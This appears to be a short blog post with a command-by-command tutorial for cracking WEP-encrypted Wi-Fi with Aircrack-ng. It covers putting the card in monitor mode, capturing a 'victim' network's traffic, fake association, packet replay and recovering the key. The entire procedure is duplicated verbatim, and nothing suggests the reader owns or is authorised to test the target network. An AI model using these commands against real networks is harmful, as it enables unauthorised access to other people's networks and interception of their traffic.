Not much details included here. If you want to go to depth on it then please visit the official Aircrack-ng page, here.
First find out whether your card is supported or not.
If yes then follow with following steps.
Become root and type these on the first tab/terminal.
***NOTE: The bold words are to be replaced with the necessary info***
airmon-ng start wlan0
-- To put your wireless card into monitor mode for sniffing datas.
airodump-ng mon0
-- To scan for wireless networks available in your area. Find your victim with WEP encryption.
airodump-ng -w filename -c channel_number --bssid victim's_mac mon0
-- To collect the data from your victim network. Replace the bold one's with necessary info shown as result of the second command.
aireplay-ng -1 0 -a victim's_mac -e victim's_essid mon0 [ In new tab/terminal]
-- To fake associate with the victim AP.
aireplay-ng -3 -b victim's_mac -e victim's_essid mon0
-- To ask the victim AP to generate more packets/replay packets.
Keep looking on the airodump-ng tab/terminal. Once the data/packets reach 5000 you can start cracking. For this open a new tab/terminal and type the following command:
aircrack-ng --bssid victim's_mac filename
If 5000 was enough then it will vomit the key instantly, otherwise you may need to wait according the key strength.
First find out whether your card is supported or not.
If yes then follow with following steps.
Become root and type these on the first tab/terminal.
***NOTE: The bold words are to be replaced with the necessary info***
airmon-ng start wlan0
-- To put your wireless card into monitor mode for sniffing datas.
airodump-ng mon0
-- To scan for wireless networks available in your area. Find your victim with WEP encryption.
airodump-ng -w filename -c channel_number --bssid victim's_mac mon0
-- To collect the data from your victim network. Replace the bold one's with necessary info shown as result of the second command.
aireplay-ng -1 0 -a victim's_mac -e victim's_essid mon0 [ In new tab/terminal]
-- To fake associate with the victim AP.
aireplay-ng -3 -b victim's_mac -e victim's_essid mon0
-- To ask the victim AP to generate more packets/replay packets.
Keep looking on the airodump-ng tab/terminal. Once the data/packets reach 5000 you can start cracking. For this open a new tab/terminal and type the following command:
aircrack-ng --bssid victim's_mac filename
If 5000 was enough then it will vomit the key instantly, otherwise you may need to wait according the key strength.
No comments:
Post a Comment